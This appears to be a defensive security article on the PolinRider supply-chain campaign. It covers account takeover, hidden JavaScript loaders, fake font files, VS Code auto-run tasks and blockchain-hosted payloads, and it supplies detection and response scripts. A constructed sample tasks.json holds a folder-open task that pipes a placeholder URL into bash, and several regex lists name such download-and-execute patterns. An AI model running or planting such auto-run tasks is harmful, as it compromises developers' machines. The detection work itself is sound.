
Introduction
The software supply chain has become the new frontline in cyber warfare, and the PolinRider campaign represents one of the most sophisticated escalations seen to date. Threat actors linked to North Korea’s Contagious Interview and Famous Chollima clusters have systematically compromised legitimate GitHub maintainer accounts to publish infected package versions across npm, Packagist, Go modules, and even Chrome extensions. With 162 malicious release artifacts identified across 108 unique packages, this campaign demonstrates that no ecosystem is immune. What makes PolinRider particularly dangerous is its use of blockchain-based dead-drop infrastructure for command-and-control, making takedown efforts nearly impossible.
Learning Objectives
- Understand the full kill chain of the PolinRider supply chain attack, from GitHub account takeover to malicious package publication
- Master detection techniques for obfuscated JavaScript loaders hidden in configuration files and fake .woff2 font files
- Learn to audit VS Code task configurations and identify malicious “runOn: folderOpen” auto-execution vectors
- Implement forensic investigation procedures and remediation strategies for compromised developer environments
- Deploy supply chain security tools including GuardDog, Socket, and custom detection scripts across Linux and Windows
1. The Anatomy of GitHub Maintainer Account Takeover
PolinRider operators gain maintainer access through a combination of tactics: compromising GitHub accounts via credential theft, abusing account recovery mechanisms, or taking over expired domains associated with developer profiles. Once inside, attackers perform bulk modifications across multiple repositories within narrow time windows—a pattern clearly observed in the Xpos587 GitHub account, where several unrelated repositories were modified on June 23, 2026.
Step-by-Step Guide: Auditing for Account Compromise
1. Review GitHub Activity Logs: Navigate to any repository → Insights → Activity. Look for force-push events and commits with suspicious timestamps. The standard file view is unreliable because attackers back-date commits to make malicious changes appear older.
2. Check for Unusual Collaboration Patterns: Run the following command to enumerate all collaborators and their recent activity:
# Linux/macOS - List all collaborators with push access
curl -s -H "Authorization: token YOUR_GITHUB_TOKEN" \
  "https://api.github.com/repos/OWNER/REPO/collaborators" | jq '.[] | {login, permissions}'
# Windows PowerShell - Check for unexpected maintainer additions
Invoke-RestMethod -Uri "https://api.github.com/repos/OWNER/REPO/collaborators" `
  -Headers @{"Authorization"="token YOUR_GITHUB_TOKEN"} |
  Select-Object login, permissions
3. Detect Force-Push History Rewrites: Clone the repository and examine the reflog:
# Fetch first: a forced update of a remote-tracking branch is recorded in that branch's reflog
git fetch --all
git reflog show --all --date=iso | grep -E "force|reset" | head -20
This reveals force-push events that may indicate history rewriting.
4. Enable GitHub Security Features:
- Enforce two-factor authentication (2FA) for all organization members
- Require signed commits
- Enable branch protection rules requiring status checks
- Review and revoke unnecessary OAuth apps and SSH keys regularly
2. The Hidden Payload: Obfuscated JavaScript Loaders and Fake Font Files
PolinRider employs two primary techniques to conceal malicious JavaScript loaders. The first involves embedding one-line payloads padded with massive amounts of whitespace, pushing executable code beyond the default viewport width in IDEs. The second, more sophisticated method disguises the loader inside fake `.woff2` font files—static visual assets that developers would never suspect.
Step-by-Step Guide: Detecting Hidden Loaders
1. Scan for Whitespace-Padded Payloads: Check configuration files like `vite.config.js`, `eslint.config.js`, `postcss.config.mjs`, and `tailwind.config.js` for abnormally long single lines.
# Linux - Find files with lines exceeding 1,000 characters
find . -type f \( -name "*.js" -o -name "*.mjs" -o -name "*.json" \) \
  -exec awk 'length>1000 {print FILENAME":"NR":"$0}' {} \;
# Windows PowerShell - Detect suspiciously long lines
Get-ChildItem -Recurse -Include *.js, *.mjs, *.json | ForEach-Object {
    $lines = Get-Content $_.FullName
    for ($i = 0; $i -lt $lines.Count; $i++) {
        if ($lines[$i].Length -gt 1000) {
            Write-Host "$($_.FullName):$($i+1): Line length $($lines[$i].Length)"
        }
    }
}
2. Identify Fake Font Files: Search for `.woff2` files that are actually JavaScript:
# Linux - Check file magic bytes (a real WOFF2 file starts with 'wOF2')
find . -name "*.woff2" -exec file {} \; | grep -v "Web Open Font Format"
# Same check without relying on file(1): print any .woff2 whose first four bytes are not 'wOF2'
find . -name "*.woff2" -exec sh -c '[ "$(head -c 4 "$1")" != "wOF2" ] && echo "$1"' _ {} \;
# Examine suspicious font files for JavaScript code (prints the file name on a match)
find . -name "*.woff2" -exec sh -c 'head -c 200 "$1" | grep -qE "eval|require|function" && echo "$1"' _ {} \;
3. Deobfuscate the Loader: Once identified, the obfuscated JavaScript can be beautified and analyzed. The loader typically reaches out to blockchain RPC services (TRON, Aptos, BNB Smart Chain) to retrieve encrypted second-stage payloads, decrypts them using embedded XOR keys, and executes via `eval()`.
Python XOR Decryption Script:
# XOR decryption script for PolinRider payloads
def xor_decrypt(encrypted_data, key):
    # Repeating-key XOR: byte i of the ciphertext is XORed with byte i mod len(key) of the key
    return bytes([encrypted_data[i] ^ key[i % len(key)] for i in range(len(encrypted_data))])

# Example usage - replace the placeholders with the actual values
encrypted_hex = "..."  # Extract from blockchain transaction data
xor_key = b'...'       # Embedded in loader
decrypted = xor_decrypt(bytes.fromhex(encrypted_hex), xor_key)
print(decrypted.decode('utf-8', errors='ignore'))
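The two grep-style checks above (long lines and non-font `.woff2` files) both produce noise in real projects: minified bundles are long, and `file` output varies between systems. The following scanner is an added example, not code from the article or from any tool it names; it generalizes the checks by distinguishing whitespace padding from dense minified code (collapsing runs of spaces and comparing the visible length) and by testing the WOFF2 magic bytes directly. Thresholds, regexes and the fixture files it builds under a temporary directory are assumptions constructed for this demonstration.

```python
import os
import re
import tempfile

# Thresholds and regexes are assumptions chosen for this example, not indicators
# taken from the PolinRider report.
MAX_LINE_LEN = 1000           # same cutoff as the find/awk one-liner above
CONFIG_EXTS = (".js", ".mjs", ".cjs", ".json")
WOFF2_MAGIC = b"wOF2"         # first four bytes of a genuine WOFF2 font
JS_HINTS = re.compile(rb"\b(eval|require|function|Function|fetch|Buffer)\b")


def padded_lines(path, max_len=MAX_LINE_LEN):
    """Return (line_no, raw_len, visible_len) for long lines that are mostly whitespace.

    A minified bundle is long but dense, so it is not reported; a one-line payload
    pushed off-screen with thousands of spaces is."""
    hits = []
    with open(path, "rb") as fh:
        for no, raw in enumerate(fh, 1):
            line = raw.rstrip(b"\r\n")
            if len(line) <= max_len:
                continue
            visible = len(re.sub(rb"[ \t]{2,}", b" ", line))
            if visible * 2 < len(line):       # more than half of the line is padding
                hits.append((no, len(line), visible))
    return hits


def classify_font(path):
    """'ok' for a real WOFF2 header, 'fake-js' when the head of the file looks like
    script, 'unknown' for anything else (still worth a manual look)."""
    with open(path, "rb") as fh:
        head = fh.read(512)
    if head.startswith(WOFF2_MAGIC):
        return "ok"
    if JS_HINTS.search(head):
        return "fake-js"
    return "unknown"


def scan_tree(root):
    """Walk a project tree and return (kind, relative_path, detail) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name.endswith(CONFIG_EXTS):
                for no, raw_len, visible in padded_lines(path):
                    findings.append(("padded-line", rel,
                                     f"line {no}: {raw_len} bytes, {visible} visible"))
            elif name.endswith(".woff2"):
                verdict = classify_font(path)
                if verdict != "ok":
                    findings.append(("font", rel, verdict))
    return findings


def build_sample_tree():
    """Constructed fixture (not files from the campaign): a padded config file,
    a dense minified bundle, a genuine WOFF2 header and a fake font holding script."""
    root = tempfile.mkdtemp(prefix="polinrider-demo-")
    os.makedirs(os.path.join(root, "fonts"))
    padded = b'export default { plugins: [] };' + b' ' * 1500 + b'require("./x").run();'
    with open(os.path.join(root, "vite.config.js"), "wb") as fh:
        fh.write(padded + b"\n")
    with open(os.path.join(root, "bundle.min.js"), "wb") as fh:
        fh.write(b"var a=1;" * 200 + b"\n")            # 1600 dense bytes, no padding
    with open(os.path.join(root, "fonts", "real.woff2"), "wb") as fh:
        fh.write(WOFF2_MAGIC + b"\x00" * 40)
    with open(os.path.join(root, "fonts", "fake.woff2"), "wb") as fh:
        fh.write(b'const p=require("child_process");eval(Buffer.from("","base64"));')
    return root


if __name__ == "__main__":
    for kind, path, detail in scan_tree(build_sample_tree()):
        print(f"[!] {kind:12} {path}: {detail}")
```

Run it against a real checkout with `scan_tree(".")`; the `bundle.min.js` fixture shows why the padding ratio matters, since a plain length check would flag every minified artifact in `node_modules`.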
3. Weaponized Developer Tooling: VS Code Task Auto-Execution
Perhaps the most insidious aspect of PolinRider is its abuse of developer trust within Visual Studio Code. Attackers modify `.vscode/tasks.json` files with the `"runOn": "folderOpen"` setting, causing hidden payloads to execute automatically when a developer opens the project folder. No user interaction is required beyond granting folder trust—a step most developers perform without a second thought.
Step-by-Step Guide: Auditing VS Code Task Configurations
1. Scan for Malicious Task Definitions: Check all `.vscode/tasks.json` files for the `runOn` property (VS Code nests it under `runOptions`):
# Linux - Find all tasks.json with runOn: folderOpen
find . -path "*/.vscode/tasks.json" -exec grep -l '"runOn":\s*"folderOpen"' {} \;
# Examine the actual task commands being executed (jq fails on files that contain comments; strip them first if so)
find . -path "*/.vscode/tasks.json" -exec cat {} \; | jq '.tasks[] | {label, command, runOn: .runOptions.runOn}'
# Windows PowerShell - Detect autorun tasks (ConvertFrom-Json on Windows PowerShell 5.1 rejects comments; PowerShell 7 accepts them)
Get-ChildItem -Recurse -Filter "tasks.json" | Where-Object { $_.Directory.Name -eq ".vscode" } | ForEach-Object {
    $content = Get-Content $_.FullName -Raw | ConvertFrom-Json
    $content.tasks | Where-Object { $_.runOptions.runOn -eq "folderOpen" } |
        Select-Object label, command, args
}
2. Check for Unusual Command Patterns: Attackers often execute Node.js on fake font files or run `curl | bash` commands:
# Look for node executing non-JS files
grep -rE "node .*\.woff2" --include=tasks.json .
# Look for downloads piped straight into a shell
grep -rE "curl.*\| *(ba)?sh|wget.*\.sh" --include=tasks.json .
3. Disable Automatic Task Execution: Change VS Code’s default behavior:
// Add to VS Code settings.json
{
"task.allowAutomaticTasks": "off"
}
This prevents any `folderOpen` tasks from executing without explicit user approval.
4. Audit All Developer Workstations: Run the following detection script across your organization:
#!/bin/bash
# PolinRider VS Code Task Scanner
echo "Scanning for malicious VS Code tasks..."
find ~/ -type f -path "*/.vscode/tasks.json" 2>/dev/null | while read -r file; do
    if grep -q '"runOn":\s*"folderOpen"' "$file"; then
        echo "[!] SUSPICIOUS: $file"
        jq '.tasks[] | {label, command, runOn: .runOptions.runOn}' "$file"
    fi
done
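The grep and jq checks above break on a detail of the format: VS Code reads `tasks.json` as JSON with comments and trailing commas, which `jq` and strict parsers reject, so a loader author only has to add a comment to make the jq step fail silently. The following auditor is an added example written for this article, not code from the project or from VS Code; it strips comments outside of strings, removes trailing commas, and then flags tasks that run on `folderOpen` (checking `runOptions.runOn`, the real location of the property) or whose command matches the patterns discussed above. The regex list and the sample `tasks.json` (with a placeholder `example.invalid` URL) are constructed for the demonstration.

```python
import json
import re

# Patterns are assumptions for this example; they mirror the grep checks above.
SUSPICIOUS_CMD = [
    (re.compile(r"\bnode\b.*\.(woff2?|ttf|png|svg|css)\b"), "node executing a non-JS asset"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"), "download piped into a shell"),
    (re.compile(r"\b(eval|base64\s+-d|Invoke-Expression|iex)\b"), "inline decode or eval"),
]


def strip_jsonc(text):
    """Remove // and /* */ comments that are outside string literals, then
    trailing commas, so that json.loads accepts what VS Code accepts."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        ch = text[i]
        if in_str:
            out.append(ch)
            if ch == "\\" and i + 1 < n:          # keep escaped char, including \"
                out.append(text[i + 1])
                i += 2
                continue
            if ch == '"':
                in_str = False
            i += 1
        elif ch == '"':
            in_str = True
            out.append(ch)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j < 0 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j < 0 else j + 2
        else:
            out.append(ch)
            i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def task_command_line(task):
    """Join command and args into one string so the patterns see the whole invocation."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    return " ".join(p for p in parts if p)


def audit_tasks(text):
    """Return one finding per task that auto-runs or has a suspicious command."""
    data = json.loads(strip_jsonc(text))
    findings = []
    for task in data.get("tasks", []):
        reasons = []
        run_on = task.get("runOptions", {}).get("runOn") or task.get("runOn")
        if run_on == "folderOpen":
            reasons.append("runs automatically on folder open")
        cmd = task_command_line(task)
        for pattern, why in SUSPICIOUS_CMD:
            if pattern.search(cmd):
                reasons.append(why)
        if reasons:
            findings.append({"label": task.get("label", "<unnamed>"),
                             "command": cmd, "reasons": reasons})
    return findings


# Constructed sample, not a file recovered from the campaign.
SAMPLE_TASKS_JSON = r'''{
  // comments and trailing commas are legal here and break jq
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", },
    {
      "label": "fonts",               /* looks like an asset step */
      "type": "shell",
      "command": "node",
      "args": ["public/fonts/inter.woff2"],
      "runOptions": { "runOn": "folderOpen" }
    },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/setup.sh | bash",
      "runOptions": { "runOn": "folderOpen" },
    }
  ]
}'''

if __name__ == "__main__":
    for f in audit_tasks(SAMPLE_TASKS_JSON):
        print(f"[!] task '{f['label']}': {f['command']}")
        for r in f["reasons"]:
            print(f"      - {r}")
```

To audit a workstation, feed each file found by the `find ~/ -path "*/.vscode/tasks.json"` loop above into `audit_tasks(open(path).read())`; an empty result for a file that nonetheless fails `json.loads` is the signal to look at it by hand.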
4. Blockchain as Bulletproof C2: The EtherHiding Technique
PolinRider represents a paradigm shift in malware command-and-control. Instead of relying on takedown-vulnerable domains, the loader retrieves encrypted second-stage payloads from immutable blockchain transactions. The technique, known as EtherHiding, uses TRON, Aptos, and Binance Smart Chain to store payloads in transaction data fields of burn addresses—transactions that can never be spent or deleted.
Step-by-Step Guide: Analyzing Blockchain-Based C2
1. Extract Blockchain Addresses from Loader: Deobfuscate the JavaScript to find hard-coded blockchain addresses. Look for patterns like:
// Example pattern from PolinRider loader
const tronAddress = "T...";   // TRON address
const bscTxHash = "0x...";    // BSC transaction hash
2. Query Blockchain Data: Use public RPC endpoints to retrieve transaction data:
# Python - Query BSC transaction data
from web3 import Web3

w3 = Web3(Web3.HTTPProvider('https://bsc-dataseed.binance.org/'))
tx_hash = '0x...'  # Replace with extracted hash
tx = w3.eth.get_transaction(tx_hash)
payload_hex = tx['input'].hex()  # Contains the encrypted second stage
3. Decrypt with XOR Key: The embedded XOR key in the loader decrypts the blockchain-stored payload.
4. Monitor for Known Payloads: Decrypted payloads observed include DEVPOPPER (a remote access trojan) and OmniStealer (a credential and cryptocurrency wallet stealer). These deliver remote access capabilities, credential theft, and C2 functionality via socket.io.
Detection Commands:
# Linux - Monitor for suspicious outbound blockchain RPC connections
sudo tcpdump -i any -l "port 443" | grep -Ei "tron|aptos|bsc|binance"
# Windows - Check for connections to blockchain RPC endpoints (-f resolves foreign addresses to FQDNs)
netstat -fo | findstr /i "tron aptos bsc binance"
5. Forensic Investigation and Incident Response
Organizations that installed affected package versions must assume their environments are compromised. Immediate action is required to contain the threat.
Step-by-Step Incident Response Procedure
1. Preserve Forensic Artifacts: Before any remediation, capture:
- All package lockfiles (`package-lock.json`, `go.sum`, `composer.lock`)
- VS Code workspace settings
- System logs and network connection history
- Browser extension data (Chrome extensions are also targeted)
2. Identify Affected Developer Machines:
# Linux - Find machines that installed malicious packages
# Check npm global packages
npm list -g --depth=0 | grep -E "tailwind-color-shades|safe-validate"
# Check Go modules
go list -m all | grep -E "github.com/Xpos587"
# Windows PowerShell - Audit installed npm packages
npm list -g --depth=0 | Select-String -Pattern "tailwind-color-shades|safe-validate"
3. Remove Affected Versions and Rebuild:
# Remove malicious npm packages
npm uninstall -g <malicious-package>
# Rebuild from known-good lockfiles
npm ci           # uses package-lock.json for exact versions
go mod tidy
go mod verify    # checks the downloaded modules against go.sum
composer install # uses composer.lock for exact versions
4. Rotate All Exposed Secrets: From a clean machine, rotate:
– npm, GitHub, PyPI, and RubyGems tokens
– Cloud provider credentials (AWS, GCP, Azure)
– CI/CD pipeline secrets
– SSH keys and application API keys
5. Repository Audit:
# Audit for suspicious edits to critical files
git log --all --full-history -- \
  .vscode/tasks.json \
  config.js \
  vite.config.js \
  eslint.config.js \
  postcss.config.mjs \
  tailwind.config.js
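Steps 1 and 2 above rely on the preserved lockfiles, and `npm list -g` only covers global installs: a project-local dependency, or one pulled in transitively, shows up only in `package-lock.json` or `go.sum`. The following scanner is an added example written for this article, not code from any tool it names; it checks those two lockfile formats offline for the package and module names the article quotes as indicators (`tailwind-color-shades`, `safe-validate`, `github.com/Xpos587`, `git2md`). It handles both npm lockfile layouts (v1 nested `dependencies` and v2/v3 `packages` keyed by `node_modules` path) and the `/go.mod` suffix in `go.sum`. The fixture lockfiles, their version numbers and hashes are constructed for the demonstration; no Packagist indicator is named in the article, so `composer.lock` is left out.

```python
import json

# Indicator names quoted in the article. Add your own as the vendor advisories evolve.
NPM_IOCS = {"tailwind-color-shades", "safe-validate"}
GO_IOC_PREFIXES = ("github.com/Xpos587/",)
GO_IOC_NAMES = {"git2md"}          # matched against the last path element of a module


def scan_package_lock(text):
    """Return sorted (name, version) pairs for indicator packages in an npm lockfile.

    lockfileVersion 2/3 keys every installed package by its node_modules path, so the
    package name is the text after the last 'node_modules/'; lockfileVersion 1 nests
    'dependencies' recursively and has to be walked."""
    data = json.loads(text)
    hits = set()
    for key, meta in data.get("packages", {}).items():
        name = key.rsplit("node_modules/", 1)[-1] if key else data.get("name", "")
        if name in NPM_IOCS:
            hits.add((name, meta.get("version", "?")))

    def walk(deps):
        for name, meta in deps.items():
            if name in NPM_IOCS:
                hits.add((name, meta.get("version", "?")))
            walk(meta.get("dependencies", {}))

    walk(data.get("dependencies", {}))
    return sorted(hits)


def scan_go_sum(text):
    """go.sum lines read '<module> <version>[/go.mod] <hash>'; return sorted (module, version)
    pairs whose module matches an indicator prefix or whose last path element is an indicator name."""
    hits = set()
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        module, version = parts[0], parts[1].removesuffix("/go.mod")
        if module.startswith(GO_IOC_PREFIXES) or module.rsplit("/", 1)[-1] in GO_IOC_NAMES:
            hits.add((module, version))
    return sorted(hits)


# Constructed fixtures (versions and hashes are made up, not observed artifacts).
SAMPLE_PACKAGE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "dependencies": {"tailwind-color-shades": "^1.2.0"}},
        "node_modules/tailwind-color-shades": {"version": "1.2.3"},
        "node_modules/left-pad": {"version": "1.3.0"},
        "node_modules/some-tool/node_modules/safe-validate": {"version": "0.4.1"},
    },
})
SAMPLE_GO_SUM = """\
github.com/Xpos587/CONSTRUCTED-module v0.1.0 h1:CONSTRUCTEDHASH=
github.com/Xpos587/CONSTRUCTED-module v0.1.0/go.mod h1:CONSTRUCTEDHASH=
example.com/acme/git2md v1.0.0 h1:CONSTRUCTEDHASH=
golang.org/x/text v0.14.0 h1:CONSTRUCTEDHASH=
"""

if __name__ == "__main__":
    for name, version in scan_package_lock(SAMPLE_PACKAGE_LOCK):
        print(f"[!] npm indicator in package-lock.json: {name}@{version}")
    for module, version in scan_go_sum(SAMPLE_GO_SUM):
        print(f"[!] Go indicator in go.sum: {module} {version}")
```

Point `scan_package_lock(open("package-lock.json").read())` and `scan_go_sum(open("go.sum").read())` at the lockfiles captured in step 1; the version reported tells you which release artifact to compare against the vendor's list of infected versions.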
6. Supply Chain Security Tooling and Prevention
Several open-source tools can help detect and prevent PolinRider-style attacks.
GuardDog by DataDog: A CLI tool that identifies malicious PyPI, npm, Go modules, GitHub Actions, and VS Code extensions through static analysis and YARA rules.
# Install GuardDog
pip install guarddog
# Scan a project directory
guarddog npm scan /path/to/project
# Scan Go modules
guarddog go scan /path/to/project
Socket: Provides real-time supply chain protection with AI-powered detection.
# Install Socket CLI
npm install -g @socketsecurity/cli
# Scan dependencies
socket scan
# Monitor for malware in real-time
socket monitor
Custom Detection Script:
#!/bin/bash
# Comprehensive PolinRider Detection Script
echo "[*] Scanning for PolinRider indicators..."

# 1. Check for suspicious one-line payloads
echo "[*] Checking for whitespace-padded payloads..."
find . -type f \( -name "*.js" -o -name "*.mjs" -o -name "*.json" \) \
  -exec awk 'length>1000 {print FILENAME":"NR}' {} \; 2>/dev/null

# 2. Check for fake font files
echo "[*] Checking for suspicious .woff2 files..."
find . -name "*.woff2" -exec file {} \; | grep -v "Web Open Font Format"

# 3. Check for VS Code autorun tasks
echo "[*] Checking for autorun tasks..."
find . -path "*/.vscode/tasks.json" -exec grep -l '"runOn":\s*"folderOpen"' {} \;

# 4. Check for known malicious package names
echo "[*] Checking for known malicious packages..."
npm list --depth=0 2>/dev/null | grep -E "tailwind-color-shades|safe-validate"
go list -m all 2>/dev/null | grep -E "Xpos587|git2md"

# 5. Check for blockchain RPC connections (hostnames are resolved, so match on names)
echo "[*] Checking for blockchain C2 connections..."
sudo lsof -i -P 2>/dev/null | grep -Ei "tron|aptos|bsc|binance"

echo "[*] Scan complete."
What Undercode Say
- The immutable C2 problem: PolinRider’s use of blockchain dead-drops represents a fundamental shift that renders traditional domain takedown and IP blacklisting obsolete. Security teams must develop new capabilities to monitor blockchain transactions for malicious payloads—a skillset that remains rare in most organizations.
- The developer is the new perimeter: By weaponizing VS Code’s convenience features, attackers have turned the developer’s own workflow against them. This campaign proves that endpoint detection must extend into developer tooling and IDE configurations, not just traditional malware signatures.
- Ecosystem fragmentation enables scale: The expansion across npm, Packagist, Go modules, and Chrome extensions demonstrates that attackers are exploiting the fragmented nature of open-source governance. No single registry maintains comprehensive visibility across all ecosystems, creating blind spots that adversaries exploit.
- History rewriting undermines trust: Git’s ability to rewrite history through force pushes is a feature for collaboration but a vulnerability for security. Organizations should implement branch protection policies that restrict force pushes and require signed commits for all production branches.
- Remediation requires holistic thinking: The 7span case—where maintainers removed fake font files but missed whitespace-hidden payloads in configuration files—illustrates that partial remediation is insufficient. Incident response must encompass all hiding techniques simultaneously.
- The campaign is modular and adaptive: The loader-based architecture means PolinRider can deliver any malware family. Defenders should treat any infection as a potential beachhead for more sophisticated follow-on attacks, not a single-purpose stealer.
- Identity is the critical control: Account takeover is the primary enabler of this campaign. Enforcing 2FA, monitoring for suspicious OAuth app installations, and regularly reviewing account recovery methods are the most effective preventive measures organizations can implement today.
Prediction
- +1 Expect to see PolinRider-style techniques adopted by other threat actors, including ransomware groups, as the effectiveness of blockchain-based C2 becomes more widely understood. This will democratize resilient malware infrastructure.
- -1 The immutable nature of blockchain C2 means that once a payload is published, it cannot be retracted. Organizations will face long-term exposure to stolen credentials and compromised systems, with remediation costs potentially exceeding $10 million per major incident.
- -1 Smaller open-source maintainers without dedicated security teams will remain the primary attack vector, as they lack the resources to implement robust account security. This will accelerate the trend toward corporate-backed open-source foundations with mandatory security requirements.
- +1 The security community will develop new tools specifically designed to monitor blockchain transactions for malicious payloads, creating a new sub-industry in supply chain security. Expect to see commercial offerings in this space within 12–18 months.
- -1 AI-assisted code generation may inadvertently accelerate the spread of PolinRider-style attacks, as attackers use LLMs to generate more convincing decoy packages and obfuscated loaders that evade detection by traditional static analysis.
- +1 Increased awareness of VS Code task vulnerabilities will lead to improved default security settings in IDEs, with “runOn: folderOpen” either disabled by default or requiring explicit administrator approval. This will raise the bar for future workflow-based attacks.
- -1 The campaign’s expansion into Chrome extensions suggests that browser extension supply chains are the next frontier. Organizations should expect attacks targeting CI/CD pipeline integrations and GitHub Actions within the next six months.
Reported By: Mayura Kathiresh – Hackers Feeds